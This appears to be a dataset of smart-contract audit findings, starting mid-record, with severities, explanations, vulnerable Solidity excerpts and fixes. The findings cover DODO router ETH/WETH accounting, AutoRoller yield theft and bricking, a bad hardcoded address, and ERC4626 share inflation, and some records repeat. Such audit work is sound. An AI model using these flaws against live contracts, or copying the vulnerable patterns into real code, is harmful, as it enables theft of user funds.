judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n 
require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does has payable modifier and user can send ETH along when calling this function.\\nHowever, the toTokenOriginBalance is check the only WETH balance instead of ETH balance.\\n```\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\nThen we do the swap:\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, \"At least one pool required\");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, \"Incorrect msg.value\");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, \"Incorrect msg.value\");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & 
DIRECTION_FLAG == 0;\\n\\n tokensBought = NewUniswapV2Lib.getAmountOut(\\n tokensBought, pool, direction, p >> FEE_OFFSET\\n );\\n (uint256 amount0Out, uint256 amount1Out) = direction\\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\\n IUniswapV2Pair(pool).swap(\\n amount0Out,\\n amount1Out,\\n i + 1 == pairs\\n ? (tokensBoughtEth ? address(this) : msg.sender)\\n : address(pools[i + 1]),\\n \"\"\\n );\\n }\\n\\n if (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n }\\n\\n require(tokensBought >= amountOutMin, \"UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT\");\\n }\\n```\\n\\nas we can clearly see, the code first receives ETH, wraps ETH to WETH, then in the end, unwraps the WETH to ETH and sends the ETH back to complete the trade.\\n```\\nif (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n}\\n```\\n\\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\\nbecause as we see above, the method on the Paraswap side wraps ETH to WETH but in the end unwraps WETH and sends ETH back.\\nThere is also a lack of a method to wrap the ETH to WETH before the trade. 
making the ETH-related order not tradeable.чWe recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, \"invalid ETH amount\");\\n```\\nчA lot of method that does not use WETH to settle the trade will not be callable.ч```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n -AutoRoller#eject can be used to steal all the yield from vault's YTsчhighчAutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. 
Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via 
divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? 
tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.чCombine returns the amount of target yielded by combining the PT and YT. This balance is the amount of assets that should be transferred to the user.чUser funds given to the wrong personч```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 
0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n -Adversary can brick AutoRoller by creating another AutoRoller on the same adapterчhighчonSponsorWindowOpened attempts to make a new series at the desired maturity. Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. 
Since the maturity now exists, the first AutoRoller will always revert when trying to Roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested months ahead, truncated down to the first of the month. It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address 
pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exist then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months. Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.чRequiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. 
It seems like a large refactoring is needed for the rolling section of the AutoRollerчAutoRollers will frequently be brickedч```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n -Hardcoded divider address in RollerUtils is incorrect and will brick autorollerчmediumчRollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. 
If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.чRollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.чIncorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adaptersч```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n -AutoRoller#eject can be used to steal all the yield from vault's YTsчhighчAutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 
0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call 
above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.чCombine returns the amount of target yielded by combining the PT and YT. 
This balance is the amount of assets that should be transferred to the user.чUser funds given to the wrong personч```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n -Adversary can brick AutoRoller by creating another AutoRoller on the same adapterчhighчonSponsorWindowOpened attempts to make a new series at the desired maturity. 
Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. Since the maturity now exists, the first AutoRoller will always revert when trying to Roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested months ahead, truncated down to the first of the month. 
It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exist then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months. 
Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.чRequiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. It seems like a large refactoring is needed for the rolling section of the AutoRollerчAutoRollers will frequently be brickedч```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n -Public vault : Initial depositor can manipulate the price per share value and future depositors are forced to deposit huge value in vault.чhighчMost of the share based vault implementation will face this issue. The vault is based on the ERC4626 where the shares are calculated based on the deposit value. By depositing large amount as initial deposit, initial depositor can influence the future depositors value.\\nBy depositing large amount as initial deposit, first depositor can take advantage over other depositors.\\nI am sharing reference for this type of issue that already reported and acknowledged. 
This explain how the share price could be manipulated to large value.\\nERC4626 implementation function mint(uint256 shares, address receiver) public virtual returns (uint256 assets) { assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up.\\n```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\nчConsider requiring a minimal amount of share tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the DAO/ burn so that the price per share can be more resistant to manipulation.чFuture depositors are forced for huge value of asset to deposit. It is not practically possible for all the users. This could directly affect on the attrition of users towards this system.ч```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit 